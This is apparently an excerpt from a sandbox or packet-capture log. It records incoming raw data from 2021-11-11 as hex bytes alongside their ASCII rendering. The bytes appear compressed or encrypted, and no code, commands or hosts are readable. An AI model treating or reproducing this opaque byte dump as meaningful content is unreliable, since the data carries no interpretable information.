                                                                                                                                                                                2021-11-11 11:27:09 UTC11181INData Raw: f7 fa 99 9f 5f 1e 6f 9f cc 57 46 e0 13 f6 78 f2 e2 c9 66 f0 df 5b 6c f9 0e 92 ba d9 40 14 f2 ae 13 e1 9c 27 c6 9f b1 46 f0 0c c3 a0 43 66 ff 65 31 4a fb af 2d 5c c1 08 32 49 d3 f2 39 85 f7 04 f9 c9 96 74 a4 bf b0 3f e2 4b 08 cb da 5e d9 18 3c 14 a5 ac 1e 5b cb 51 12 29 fc bf b7 26 5b a2 1c c4 c0 10 a2 c0 d2 f7 55 12 21 fa fb 65 7a b0 4f 18 9d 73 59 27 f0 92 9d ba c1 62 bb 7f 5b e5 95 e7 86 89 c3 79 d5 42 2b 02 f4 31 5a 77 45 d0 2c b9 25 c5 ca af 54 fc 72 11 23 78 0d fe 7b 0d 44 ef 8c ad 21 4b fe 87 ce 3e c9 ce 75 14 e9 9d f5 99 30 f3 3d ff d3 24 56 e8 bb 16 e3 20 f2 35 df 8d 29 f6 64 6e 94 58 ea ce 9c 4e eb 73 98 24 8c fe 67 71 7b 5d ec 7c b5 fb d6 2d 6c a4 21 c5 12 34 84 e6 0d 4f ae 24 d8 bc 12 d3 29 90 7e e1 b7 6b f5 6c 3a bd 07 d6 e1 cd 38 48 e5 85 63
                                                                                                                                                                                Data Ascii: _oWFxf[l@'FCfe1J-\2I9t?K^<[Q)&[U!ezOsY'b[yB+1ZwE,%Tr#x{D!K>u0=$V 5)dnXNs$gq{]|-l!4O$)~kl:8Hc
                                                                                                                                                                                2021-11-11 11:27:09 UTC11197INData Raw: e3 ab 8e 9e 48 2a 4e fb c9 f5 ce 7d ec 1e 16 f0 da a8 ae 62 ab 4d ab b9 fe 9b 92 e8 ad 0f 92 f2 de 93 ee 77 89 04 08 fb 3c 75 20 8a f5 fa 0d 99 d5 cb 56 a5 27 7b 8e 0b 45 8a f5 94 de ee c7 5b 09 2d ed a5 3b d8 1e 5a d9 a8 91 a7 79 f4 b5 e2 fd ae 77 b9 fb 01 f0 45 38 e5 c1 9c 3f dd 75 7e a9 98 92 e8 ad 93 af b3 b7 92 f9 e2 5b a2 ef 96 b3 3d 16 44 03 fd d2 4e be 75 aa 89 23 2b e2 16 cb ec 7d e6 66 b5 dc 1d 27 fc 1d 96 c4 e6 f4 97 bc 4c 5b fe 34 da ac 60 5a 38 9b 29 4f ce 99 71 20 55 0c 5a 24 ac f4 89 87 de 9f e9 7a 88 9f 6e d9 d6 bf b8 90 a2 ee 57 5e df 5a 75 45 bf 21 6e 2d ff 1a a3 77 1a c2 d0 17 97 73 da 27 79 9e a7 75 66 53 5e c4 d9 37 aa de de b5 59 f4 0e c9 ff 36 2c 6c 41 63 5b f8 19 e9 94 cc 98 cf d7 1a eb 29 1d 36 00 44 f6 31 5b ff fb 34 7c ff e6 04
                                                                                                                                                                                Data Ascii: H*N}bMw<u V'{E[-;ZywE8?u~[=DNu#+}f'L[4`Z8)Oq UZ$znW^ZuE!n-ws'yufS^7Y6,lAc[)6D1[4|
                                                                                                                                                                                2021-11-11 11:27:09 UTC11213INData Raw: 12 14 d4 8c cd 5a 11 38 2e 35 a8 06 0d 90 bd 16 22 92 fd 5e 4d 95 0e 09 51 e8 6c 08 95 7b 1f 25 fa 37 11 31 e9 1e 78 ee cc d3 66 e3 e2 5f 32 55 dc 75 29 32 55 58 94 97 f7 9c 70 ee c0 bf f1 f4 ce e5 09 d9 fe 8a c4 26 c0 a4 b8 c5 7e 84 6d 34 14 ea 75 bc ef ca 03 51 24 3a fb 2d 98 3d 30 25 2d 53 9a 21 c3 2f 0b 0d ee 70 5b e9 b7 e9 5b e9 26 97 a2 25 93 cc 7b f1 58 88 2a e4 8c 6b f5 b7 d4 19 eb 46 b1 9f 61 73 25 3b da 83 16 e9 f0 8e 2b 4c b4 4b 8a d7 5f 8c 47 8b 4e 36 dd 46 2d 57 13 f1 3f 8b 87 4e bb 17 0c ec be 51 49 3e dc 42 f7 9e 69 c7 05 08 ba ce 64 a3 44 5d 29 c4 ae ec d8 8b e9 4c fe fc 31 64 fd 76 f7 8a b1 7d 7d cd 9f e5 49 b8 70 82 8b 69 d9 eb eb 74 d6 4b d5 47 9b 16 f7 76 cc 8c 2b ec 49 a6 1e 45 92 18 ab dc b1 e3 a2 07 57 e2 25 dd 4e e2 b7 70 e3 9f 45
                                                                                                                                                                                Data Ascii: Z8.5"^MQl{%71xf_2Uu)2UXp&~m4uQ$:-=0%-S!/p[[&%{X*kFas%;+LK_GN6F-W?NQI>BidD])L1dv}}IpitKGv+IEW%NpE
                                                                                                                                                                                2021-11-11 11:27:09 UTC11229INData Raw: 5f 5c f6 69 09 5e 7f ba d0 df 04 ff fa 12 ee cc bb e3 be dd d2 5c 54 2d 45 f8 25 57 9a ac 55 dc 2a 4b 7d 89 cb 3a dd d6 7a e2 89 fa 57 79 9e a7 ea 57 7f e8 56 01 e8 97 dd ba 79 de b0 4c cc e2 8a f5 db 74 2f 06 9e 41 4e 9d 49 ce ef 5d 60 4d 0f 19 35 65 b7 3e cf 38 5b 8d 38 3e d2 38 3f c7 95 21 07 09 c7 05 f3 53 2d f9 0e 4f b2 fb a6 bd 77 b5 6d b8 2d 3e f4 97 7d b1 43 30 38 c4 c9 a7 46 35 4f 90 8a a1 70 81 80 42 e9 d1 77 7b 16 a7 08 7c 07 6f 29 7f 5f 14 7a 9d cc 50 4a e9 ec b6 e4 22 63 09 51 ea 9f 30 bc a5 e1 5f b2 df 54 c1 c2 29 c9 77 73 eb 2f 09 64 b8 bc 31 ca 82 79 9d 0b 41 5c 81 46 26 e9 38 56 14 50 b5 d4 f3 c8 74 a7 c2 cd d7 6e 27 34 01 f1 50 32 9b ca f5 6d 58 16 c2 61 90 c3 40 3a cb 0d 4b e8 82 5e ea 61 6e 31 ce 2a 8a 9a 5e a6 c0 77 b3 7f 2d fb ac 2d
                                                                                                                                                                                Data Ascii: _\i^\T-E%WU*K}:zWyWVyLt/ANI]`M5e>8[8>8?!S-Owm->}C08F5OpBw{|o)_zPJ"cQ0_T)ws/d1yA\F&8VPtn'4P2mXa@:K^an1*^w--
                                                                                                                                                                                2021-11-11 11:27:09 UTC11245INData Raw: b4 69 dd 6e 18 fd 2b f8 bb e6 e2 9e 03 6a 4b ec d8 f9 c9 06 e4 45 60 0a c2 04 5e 9e e5 a5 9a d5 4a de 77 f9 54 69 82 6d ee 4c df 14 eb 97 59 f2 45 c5 98 ec d9 97 71 76 49 77 09 96 f6 f4 52 5f e8 8f 29 dd ba 0a d2 72 ff d4 b9 bc e3 e5 ef f2 c3 c9 c1 fd c7 58 2c 90 26 3f 59 c5 c2 55 96 07 9c c3 c9 62 1c f5 59 00 a1 6d 2d 4c 25 21 eb 90 27 f5 b2 f5 f2 99 b5 fe f6 ef b7 ee 9d 58 3b bf 35 06 bc 3c f4 aa 94 f9 e7 cf 5e a1 34 2a b2 2b 8b e9 ff 65 1c a3 aa b2 3e dc f7 81 5a c4 ed 72 7b c2 d7 e9 db 50 92 c2 ff 3c d0 21 5e cb a1 63 2c b2 a2 c9 b2 93 5f 7c 31 59 c2 55 66 be c5 3b fd 5e 9a 60 57 51 43 a0 d1 4e 45 ef 29 cd a7 4d d1 58 4f a9 ca 76 d4 e4 21 fb 0b 9e f4 f5 9c b3 be f7 50 cb 08 91 b2 93 e3 59 f6 0c d4 96 2f 0c f3 94 93 8c 29 4c 39 63 2b 97 89 e1 91 85 29
                                                                                                                                                                                Data Ascii: in+jKE`^JwTimLYEqvIwR_)rX,&?YUbYm-L%!'X;5<^4*+e>Zr{P<!^c,_|1YUf;^`WQCNE)MXOv!PY/)L9c+)
                                                                                                                                                                                2021-11-11 11:27:09 UTC11261INData Raw: e9 41 41 08 07 3f f8 f7 b4 22 ab c0 75 d6 8f 5a 7f b2 a0 fd 09 6d fb af a7 42 c5 51 07 c4 e0 24 ac 47 4e ef 75 77 fa b3 82 27 ca f6 50 5a 14 81 98 52 4a ea 16 b1 ac 7d b5 ed 86 8e 1b 89 89 a2 21 e7 90 5f b0 71 01 fa 97 33 76 4b 97 ef 8b 51 62 0e cd 90 5c 7a e8 12 41 4c 89 fb 3d 62 97 f6 de 48 69 18 d1 41 e2 3f 7e 4e 63 c1 16 e1 01 7a 72 ba f7 4c 1e 2f f5 40 65 5d a7 51 91 4b 90 a4 45 21 4e 18 e6 bb 58 d1 25 de c5 84 16 ee a9 e8 93 ee b2 00 d7 fc 42 b2 20 db 23 9c f2 13 08 a2 d1 92 9c 57 35 4b 01 9d 9f 2a 64 6d ae dc 8d e7 97 99 45 d9 7b a1 a2 54 71 b3 4d 89 48 55 d9 6c 45 0d e3 8a 9d ed 56 e7 6b 7f 99 9a c2 7b f3 78 99 41 11 66 41 53 43 0b 63 0c 24 df 3b 8f aa e6 55 d9 bb ae e6 2d 5e f2 c9 f5 ce f9 aa cf f6 2c 72 c1 f8 e3 3b a8 a2 b9 7a 82 6f 33 77 51 a2
                                                                                                                                                                                Data Ascii: AA?"uZmBQ$GNuw'PZRJ}!_q3vKQb\zAL=bHiA?~NczrL/@e]QKE!NX%B #W5K*dmE{TqMHUlEVk{xAfASCc$;U-^,r;zo3wQ
                                                                                                                                                                                2021-11-11 11:27:09 UTC11277INData Raw: f5 5e 78 be 2f e9 14 ef bf b1 50 ec 7b fc c3 b5 bf 9c ff 20 82 e2 5d d9 71 69 94 63 b5 42 ef 75 96 86 90 4e 48 cc a7 5a e7 4c 65 14 c4 ed a7 da c6 71 4d a7 41 4c ca f6 df ee ec 5b e5 b6 c1 5f fb 39 e4 7f d2 7a cd dd fb 4c 27 0b 59 5d 36 fa bf 7c 37 6b 57 2e 11 3c 25 d1 ea cb d7 a9 42 f6 ac e4 09 f6 1c 69 f1 df 4e 12 4b e6 ae 2d 1d 3a 20 bd 09 c2 48 9f 51 91 8b 31 fb 77 89 74 dd 4e 7e 97 fc d6 6b 42 ba 16 d2 17 44 03 06 80 14 08 b9 cf 4f 04 bd 51 c4 01 f6 fa fc bc b1 31 d6 28 d2 a2 e2 82 73 45 01 50 13 95 7c a3 2f de c4 eb e3 a0 25 c4 c4 57 b0 5d 01 da 9f 57 8d b5 b7 3a aa 3c 89 ce 97 ce 69 45 04 6e a7 3f 58 f9 4f ab cd 94 7a 10 91 3e c5 81 e4 ef b3 1f 97 eb cb ad 2c f2 c0 c5 ee 65 e7 ab d8 8d f4 5a 20 28 9d 05 a4 37 82 a1 7f 16 04 26 09 cc 73 5a 55 fc ab
                                                                                                                                                                                Data Ascii: ^x/P{ ]qicBuNHZLeqMAL[_9zL'Y]6|7kW.<%BiNK-: HQ1wtN~kBDOQ1(sEP|/%W]W:<iEn?XOz>,eZ (7&sZU
                                                                                                                                                                                2021-11-11 11:27:09 UTC11293INData Raw: ea 7b 8e 3c 2d c0 0b 6f 77 16 bd 85 e2 89 c1 91 54 6b d2 57 fc b4 c2 21 e6 56 43 25 f3 7a 8f 09 c2 eb 37 2b 37 dd 94 fd 56 ec b2 10 eb 10 88 29 09 05 70 99 ad f2 5d c5 d8 08 14 12 7c bc 42 fe 29 41 6b b6 a8 4b 13 6b 8a 15 45 81 22 02 96 ae cd 5a 3a ea 0b 8c c8 f7 c7 19 93 c1 ac b0 c9 ec d6 79 e2 89 f6 7d 7e be 4f f0 2d 17 1a 54 2b a9 d6 c8 e9 00 23 2d 20 83 38 fa 29 5f ca e6 80 45 b3 6f 9d 40 7e b9 4e 97 eb 29 99 33 47 17 66 29 e8 f6 93 bf d7 d8 99 53 3e a5 09 af e5 8c a7 89 e0 76 21 6f e8 03 a5 ca 81 6a 03 7d 66 47 a6 2a 0c 45 09 17 66 64 55 5b 0e eb 4b 9a ee f7 93 8f 0c 36 09 33 9c f1 32 ee 73 e7 29 97 a4 ab 8e ad 69 0e d1 f3 07 31 19 8b 39 f4 2f 73 fa 33 73 49 af 52 7c 4e ef fe 3c de c2 95 65 cd 2f 6a da 5d 51 20 45 f2 ba da 6e 2f c1 19 f3 da 44 b8 ff
                                                                                                                                                                                Data Ascii: {<-owTkW!VC%z7+7V)p]|B)AkKkE"Z:y}~O-T+#- 8)_Eo@~N)3Gf)S>v!oj}fG*EfdU[K632s)i19/s3sIR|N<e/j]Q En/D
                                                                                                                                                                                2021-11-11 11:27:09 UTC11309INData Raw: 3a 49 ae a7 32 42 07 2d f3 f7 39 e2 c9 2a eb 67 25 a4 c2 ca 2c 5f 72 3c e1 dc 82 ce 08 04 be 25 d2 f2 b9 2d 31 d3 09 b4 54 51 c9 d0 22 ff 7f b6 30 2f 0d d4 e8 ef f3 ee ce 3f 4a fe d8 96 c1 93 33 27 59 c5 0d 44 2b 68 45 64 fa e7 69 4b be 42 c0 44 03 33 55 b0 6d 09 d8 97 5d 29 b4 f7 62 ef 59 f4 47 c4 7b d1 7f 44 70 ef 8b ad 7d 04 21 b2 e9 3a 0d b5 96 cd d3 3f dd b3 45 28 ec 38 e7 7b 5f 6c 1b 95 89 fe d9 c3 49 ab c2 55 e5 2f af fd 11 67 b7 2a 99 8d 29 f6 c4 c3 78 57 e0 92 56 1f 0e a6 42 a5 7c e5 e5 ee f3 fd 5f f7 f4 4a ab 65 9b eb 97 f7 4a d1 af 5f 9a 3a 5d 76 aa 65 36 93 4c 66 17 66 f7 c0 bc cd a4 ef e2 6d d3 b2 be 8f 44 49 1f 7d 11 eb ed db 9a ee 3a 5d fe 27 a7 7f 21 24 41 84 75 3d 3a d7 f8 ac 5a e0 91 4c ec f8 97 56 03 cf a9 df ff 30 c1 41 b3 7a 04 b5 fe
                                                                                                                                                                                Data Ascii: :I2B-9*g%,_r<%-1TQ"0/?J3'YD+hEdiKBD3Um])bYG{Dp}!:?E(8{_lIU/g*)xWVB|_JeJ_:]ve6LffmDI}:]'!$Au=:ZLV0Az
                                                                                                                                                                                2021-11-11 11:27:09 UTC11325INData Raw: 2b 02 9b 3e 81 2d 86 27 b1 21 6a b1 bf 3a fa 39 39 7a d8 ce f9 97 b1 31 41 a7 2c 75 04 a4 25 be bc b8 b5 ef e6 15 5b 16 f3 fe 37 e8 ab df ec 80 4b e1 bb 23 c2 2f d5 ee f6 ae 5e a6 9b 27 ef 1a c6 d4 dc 16 ee ae 72 41 35 75 f4 b2 72 70 2c 9f c5 83 a7 7f b9 30 f3 3e 65 f3 fc 76 a4 ab 99 fd 3a e9 fd 09 4d 63 3e 21 55 48 09 f6 7c 19 b4 0b 8a 3b 5d 09 6b 77 c5 6c 25 7e f9 72 5f b2 8a 62 5d fd 59 f0 e4 20 09 ec 74 8b 51 c2 b8 c7 25 8b 4a 13 55 56 05 7b b4 d9 17 20 e0 38 b5 db 29 32 71 0b 06 e9 d4 32 34 24 08 31 5f 78 39 df 08 ef d4 d7 51 c5 76 83 27 f5 de d9 e9 d6 02 eb 4a 3f 75 f1 54 48 5d 65 e8 cc a9 89 5d c9 55 d7 94 d9 bb e7 9d 4a cd cb 2a fe 32 dd 1b 77 f3 ad 2d 39 c4 ce 3a a6 c1 55 4e 3b a8 f1 f5 c8 13 44 27 33 1e 32 be 85 22 ea 56 25 eb 62 d7 c5 d4 94 64
                                                                                                                                                                                Data Ascii: +>-'!j:99z1A,u%[7K#/^'rA5urp,0>ev:Mc>!UH|;]kwl%~r_b]Y tQ%JUV{ 8)2q24$1_x9Qv'J?uTH]e]UJ*2w-9:UN;D'32"V%bd
                                                                                                                                                                                2021-11-11 11:27:09 UTC11341INData Raw: e1 5d e2 05 f0 eb 74 d6 ed ea c9 ce 75 31 f7 11 ee de d4 69 7d c2 3c 77 ce c8 5e c1 e6 fa 4f a1 57 2a e2 8a 91 75 4f ef 13 ee 2c 3f 91 a0 6a 31 d1 bf 59 d7 49 fb a6 3f 4f ac 36 d7 a0 16 ed fb 3a f8 9a f4 56 9d fb 69 04 de 81 30 45 09 55 2f f9 61 da 4e d1 d3 64 70 56 a9 81 93 be 85 de fc cb 17 21 d1 00 2b 30 34 cf 9f 49 bd f9 70 97 01 cf 79 5a b5 ff 2e e9 66 a0 b2 0f 86 ef 33 3c 97 a1 87 a4 7a c4 05 72 c7 63 fe dd 95 2b bb 62 9b c9 e6 8c 2f 31 f2 32 01 a9 a7 5d 73 0b 25 d4 1d cb 75 62 07 42 f2 5d 5c 81 52 67 83 27 0b a8 5f 6e 6d 4f 27 ce a5 75 57 e8 98 09 44 21 23 5e 6a 74 97 f0 89 b5 de 3f c7 48 5e 0b 9c f7 47 ea 12 37 ee ce c6 92 ec ed b0 27 8b 74 5f f5 27 c6 09 b4 e4 ec 09 17 83 ab eb a1 2c 12 a8 e9 ed 25 2d d4 a8 c9 c4 a3 fb ec b9 e1 24 c0 7e 1e 12 17
                                                                                                                                                                                Data Ascii: ]tu1i}<w^OW*uO,?j1YI?O6:Vi0EU/aNdpV!+04IpyZ.f3<zrc+b/12]s%ubB]\Rg'_nmO'uWD!#^jt?H^G7't_',%-$~
                                                                                                                                                                                2021-11-11 11:27:09 UTC11357INData Raw: 25 55 b9 54 31 24 4e e8 97 4f d4 91 08 64 7c 3e aa dd d1 3b 14 53 96 4e dd 43 34 37 c0 fa 64 81 e8 84 12 f7 18 9c 82 4b 39 5e b7 ee eb ce 7c 56 78 89 c1 97 5e 80 2f 56 27 4b 7d 1c c7 fd 7d 0c 99 e0 4d cd f5 2b 66 af 14 ef 02 c5 d7 f1 89 e2 e1 10 f1 1e 2c d9 0d 31 cd 0c 3e c4 f7 ef 24 93 e7 41 25 e0 5b c4 15 12 75 4b c8 eb 45 2d 8a 23 dc 6e 6f 57 e2 72 c3 4d 29 c8 5e 7e 88 12 09 4a c9 dd d6 f5 c8 3a 29 90 3b 64 92 ba f6 a7 4a fc 22 85 c3 0c b3 eb 32 23 cb 88 7c f5 5a 7b 10 a8 3d 95 94 50 22 e1 20 60 5f a0 3c 24 e9 2c a0 11 31 c8 9d d3 fa bd 27 f8 5b c8 8b 01 e9 72 c1 9d e6 91 5a 5f ad e9 d3 56 31 99 7b 45 73 af ca 49 29 f0 55 13 e9 98 79 ca 9c 90 69 79 3d 49 1a 04 7f 89 3b e6 7a f2 39 5f 29 64 35 4a 8e 10 1a 89 c2 48 ce a7 4e f4 ff 8b 2a 16 48 35 39 c6 7e
                                                                                                                                                                                Data Ascii: %UT1$NOd|>;SNC47dK9^|Vx^/V'K}}M+f,1>$A%[uKE-#noWrM)^~J:);dJ"2#|Z{=P" `_<$,1'[rZ_V1{EsI)Uyiy=I;z9_)d5JHN*H59~
                                                                                                                                                                                2021-11-11 11:27:09 UTC11373INData Raw: 51 bc 6f a0 63 30 4d 29 fe b7 62 71 f5 6c 38 95 d6 82 be a7 48 f4 82 96 e5 b8 01 e7 ee 8b 36 7c a8 2d df 32 91 f1 a2 27 77 1e de 4d 05 e9 89 13 f9 ba ac 6d ad dc 34 7b 5e 30 53 c2 d1 7d 21 ce 2a fa 7c 69 03 a4 3a 7d 1c bf f1 06 c4 ee fe a3 ad 92 9c f7 e2 4f 04 98 60 01 5b d7 f8 f2 b2 49 ff 4e 9a b7 7c 4d 6b 92 6d 01 ad d1 66 8b 6b a1 aa 51 8e ed 20 68 bc e4 bf c1 77 81 e7 3e b3 7f 85 33 3e a7 e7 4b 65 cf ee 74 0b 92 9d ca f7 71 1b 69 ff 94 08 fb 26 86 25 f6 51 59 82 d2 41 2b 3f d5 73 1b 09 89 c8 73 e7 17 31 49 65 ed 55 4e e0 40 f1 d9 b5 c5 bc 26 00 61 41 09 7d 3e 29 de 28 9d 4e 9c fd c3 4c 90 f0 e5 fc e9 4f ea 71 8d e9 3f 2b d8 37 b8 02 d6 d7 5d 49 21 f9 5d 33 f4 3e ce f6 de 8e 33 7a b3 4a 2d f4 01 25 c7 c6 2d ec c4 2d e1 04 e5 56 a7 d0 d4 4e 7d e7 25 4e
                                                                                                                                                                                Data Ascii: Qoc0M)bql8H6|-2'wMm4{^0S}!*|i:}O`[IN|MkmfkQ hw>3>Ketqi&%QYA+?ss1IeUN@&aA}>)(NLOq?+7]I!]3>3zJ-%--VN}%N
                                                                                                                                                                                2021-11-11 11:27:09 UTC11389INData Raw: 1c 34 9a 9f 9f 65 c0 ad f1 49 17 cf ff dc 3d c7 59 0b 9f 89 01 fe 26 50 e9 40 b5 ba 3e f5 32 d5 d8 97 97 45 43 2d 7f 0d e0 30 7f a8 0a b4 a6 59 0b 45 03 3c c1 af df 7a 81 1f 9b 25 c4 2c 49 9d d5 33 0e f5 56 07 17 c7 bf 74 f3 fa 92 e6 c9 77 96 73 95 db bc a7 8b df 45 69 a5 f8 54 b5 ba c4 d5 71 bf 27 fd 9a 14 c5 bb 09 8b 02 f5 89 fa dd 14 f1 2d c4 12 ed 59 27 5e 16 52 5d d4 df 69 3b da f2 88 96 f0 54 05 30 c6 98 74 5a f4 84 bb be 67 a4 d2 63 17 60 76 d3 48 b3 94 a7 5f ce 20 bd f4 37 68 91 12 fc b2 e4 84 f2 f0 39 00 9b 10 ff e0 9f f1 8f 6f d3 d9 c9 05 bc bf f2 e8 d6 eb 28 0f e1 bd f1 94 c9 96 f6 53 c3 3b 38 80 4a a2 7b c5 01 f1 fa 21 9b f6 04 6a 39 b1 65 d5 29 93 d6 bd 20 5a e8 ca a1 89 f3 3e ed 0d 5a 12 c8 38 27 4c 26 09 f6 31 50 81 cb 43 80 2d eb ff 39 4d
                                                                                                                                                                                Data Ascii: 4eI=Y&P@>2EC-0YE<z%,I3VtwsEiTq'-Y'^R]i;T0tZgc`vH_ 7h9o(S;8J{!j9e) Z>Z8'L&1PC-9M
                                                                                                                                                                                2021-11-11 11:27:09 UTC11405INData Raw: 64 bd 3a 2e 76 d7 ea a0 a5 c7 8d 20 a4 95 16 39 aa ab 55 1a db 77 64 1e 85 89 2e 5a 18 31 06 63 75 bd 12 cb 77 c9 ff cc 7b 3d b2 2f bb 12 cb 52 01 ec 08 bc 08 84 f4 19 b7 71 c3 ef b6 8c 81 78 be 35 42 1c 24 57 59 6c 62 31 1b 57 59 cb c0 27 3f 97 03 58 42 e6 ca 06 45 0a 31 18 5c f1 02 6a 75 42 bb 8a 42 49 38 5b b8 1a b6 42 39 b2 8d ad 0c 5c a8 5a 7f 6d 1b 10 cf 2a 07 5c 58 fd 5b d3 bb df 1d 70 a4 5c 53 0e 9e c4 33 0b fa ac 3b b5 12 76 fe 8e f2 12 01 0e fd 60 a0 85 27 94 4f 67 fc d8 b4 ef e2 de 4b a1 0b 2e 2d b3 78 76 87 01 0b dd 6b 39 a3 7f 9d 16 8c 9d de c9 cf 88 f5 a5 ea a9 48 6d 66 2d 25 d4 d2 e1 f5 45 ec be d9 14 44 89 18 2f 93 37 40 02 b2 f1 92 50 0e 67 09 13 55 96 58 97 19 16 fd 23 cf 25 02 fd 47 b4 00 c0 e0 6a 25 1a 41 09 50 4c 63 07 7f 67 5c 12 06
                                                                                                                                                                                Data Ascii: d:.v 9Uwd.Z1cuw{=/Rqx5B$WYlb1WY'?XBE1\juBBI8[B9\Zm*\X[p\S3;v`'OgK.-xvk9Hmf-%ED/7@PgUX#%Gj%APLcg\
                                                                                                                                                                                2021-11-11 11:27:09 UTC11421INData Raw: 9f 89 63 09 f6 3e 5b ef 40 0b 41 ff e5 bf 96 b5 9d 0b bc 59 d5 c2 2b 37 04 33 05 f0 10 a6 d8 57 47 4c e1 44 24 f0 5e 78 ce c0 4a ba 28 27 31 5b fe 9d d0 38 3c a4 fa 62 21 3f 65 f2 2f 74 5f e9 70 85 25 ea f0 e7 e6 27 4e 09 96 67 4a 81 2d f6 4a b2 ee eb 5d 45 a5 2f 73 2a 0a e3 40 1e 89 3c 24 5d 48 1a ed 01 b4 39 cf 4a ee 3d 68 4b 25 5d 64 53 5f ec f9 81 d3 aa d8 16 c5 e1 2f 8b 29 09 4c 29 e6 94 4b 25 09 ca f2 1e 09 ec 8c d5 69 6c 48 b6 c1 25 79 49 49 fb 11 13 c0 e8 dc dd 52 38 be ce 7b 4a fa 77 5b f0 32 ab 41 3f 9f 56 17 cf a9 d2 d5 1e 3c 2e cd 80 b4 52 ff ee 67 92 da b5 ce fc b5 d4 e4 ad 09 3e 5e 4d e9 57 ee 5f 9d f7 8b 6d 6e 60 22 c2 78 12 45 03 06 ff 74 c6 9d e0 7f e4 e0 ff 97 59 38 44 c4 ca 93 5f 9d dd e2 cc ce 5e f9 dd 88 37 cd 21 f5 0d 44 29 7f 3a f0
                                                                                                                                                                                Data Ascii: c>[@AY+73WGLD$^xJ('1[8<b!?e/t_p%'NgJ-J]E/s*@<$]H9J=hK%]dS_/)L)K%ilH%yIIR8{Jw[2A?V<.Rg>^MW_mn`"xEtY8D_^7!D):
                                                                                                                                                                                2021-11-11 11:27:09 UTC11437INData Raw: f2 49 59 bd 87 41 33 39 ab 7d b0 ee 09 ca c9 88 eb 46 a4 b5 d1 dd 4b f1 2a 32 48 3b fc c8 43 e0 4d 9a d7 fe 1a eb 54 bb c5 ce 45 6a 21 c4 af 17 4e eb 2d 7b 7e b8 9b 05 ad 93 ea 1c d4 d8 ab 9d 5a cd f3 3b bd 3a 85 09 fb af 65 1b b4 eb ee 13 0f 86 16 64 3b 01 cc 10 a6 76 1d 7f 61 48 48 25 2f 99 11 c2 2d 1a 08 38 f7 b6 09 23 c6 96 4c 12 e0 ed c0 92 f8 f0 2d 3f 16 a2 9d c1 48 41 3f fd f4 99 e9 e9 3e ba 75 ca a1 ee 2f a9 7b a0 3e 04 68 f3 6e b6 11 c2 f1 f6 16 ff 3b cd a2 e9 77 cc 5d 27 8e 6c 46 a1 2c 40 8a 0e 04 84 31 9c e8 25 a1 e2 10 7a 29 6c 38 1c 4f ac 31 b4 ac 47 e6 3c ac 9c 9d f3 17 16 c7 8e 01 16 4d 8b f9 4d d7 f2 59 25 ea fd c5 9f a5 d1 20 44 c1 dd b9 3a b6 ef 2a 08 0e b7 d1 67 2f dd 12 60 25 d4 72 31 7e 35 88 33 cf 9d ed 9a d8 7d e2 20 73 b1 44 04 53
                                                                                                                                                                                Data Ascii: IYA39}FK*2H;CMTEj!N-{~Z;:ed;vaHH%/-8#L-?HA?>u/{>hn;w]'lF,@1%z)l8O1G<MMY% D:*g/`%r1~53} sDS
                                                                                                                                                                                2021-11-11 11:27:09 UTC11449INData Raw: bf 74 7a ab f2 6e 12 05 04 32 a5 02 f5 e5 f5 49 d5 ce 96 97 1a 81 c2 bd dc 70 e4 df ae 98 83 4c 27 31 e8 d7 19 ae 44 7a ac 49 27 e7 1c 5b b7 54 82 39 af ef e5 23 3c 56 7a 56 17 3d 45 2d 07 fc d9 ed 4b 7f ad 9d 89 c1 fb 3a 12 88 b9 16 96 fb dd 41 de 4c 21 41 eb 2a b0 4b ca bf dc 64 ef 16 fb 65 53 c8 a7 37 91 06 3e 93 29 da dd 13 2b a3 9c 14 41 5d a4 4f a0 0c d0 95 c5 1b 96 44 a8 ca 8b 85 f4 7e c2 35 40 65 97 93 d9 f8 e8 e5 ef b6 de 5b 24 45 0b 8b 29 a9 e3 a2 4f f7 3f d5 1c 93 95 57 33 7e ba 88 73 a6 25 7f b0 02 c4 61 e1 6c a7 b7 ee eb f0 ba 61 84 9e d3 f9 f9 8b 45 eb 9d f3 df f4 8a 1c 2d cf 53 c5 09 6e a3 56 4a eb 22 7a 21 f7 76 6a 50 ce 04 97 9c 68 bf db 36 93 c6 be 33 dd 36 d4 f9 f1 cb f0 f3 2c 33 d0 f3 9f d4 e1 ff f7 09 4b 98 9e c6 a1 58 40 d5 ce 3f 67
                                                                                                                                                                                Data Ascii: tzn2IpL'1DzI'[T9#<VzV=E-K:AL!A*KdeS7>)+A]OD~5@e[$E)O?W3~s%alaE-SnVJ"z!vjPh636,3KX@?g
                                                                                                                                                                                2021-11-11 11:27:09 UTC11465INData Raw: d6 5c de 3c ac 04 2e 81 a3 88 b6 20 d2 9c 55 ea 95 fb ec 24 57 71 44 6f c9 62 3e 8a b2 20 02 5a e8 65 ce 75 18 82 34 31 f7 79 8f 72 d8 d9 bd ca 43 0e dc 47 33 8f 0e 4b 03 45 b9 25 74 38 27 d1 c7 49 1b 5b bf 04 04 8b 4f 5b a9 b6 92 bc d0 5f b6 ae 55 60 7b f7 ee 5f b4 34 c1 bb f6 9d 21 09 09 df 9a 46 79 3f 2d ff b2 89 42 91 f9 7b cb f0 7b 97 fd b1 5b ea 9c 45 91 21 08 e2 f0 a7 f6 8a 05 45 03 65 bf b2 8f 25 eb f5 b2 12 75 30 a4 21 c7 bb e8 a7 7f 18 53 45 21 4d 23 13 4f af cb 17 4e a1 bc 7b ed 6c d2 a6 5f 38 81 04 71 d5 d7 52 a9 87 97 e5 7f ad f6 32 0c 05 a0 ff fb 99 bc 92 2e f7 ab 13 53 ff 65 42 ef a3 32 25 b0 f4 90 50 9f f7 25 c1 0d f7 38 20 c9 80 9f e5 2f 2c e9 a5 fe 7a 50 44 29 09 22 4c 89 ee ec ce bf ee ef 82 c0 7f 59 49 45 50 eb f2 52 93 e1 7e 3b d5 1d
                                                                                                                                                                                Data Ascii: \<. U$WqDob> Zeu41yrCG3KE%t8'I[O[_U`{_4!Fy?-B{{[E!Ee%u0!SE!M#ON{l_8qR2.SeB2%P%8 /,zPD)"LYIEPR~;
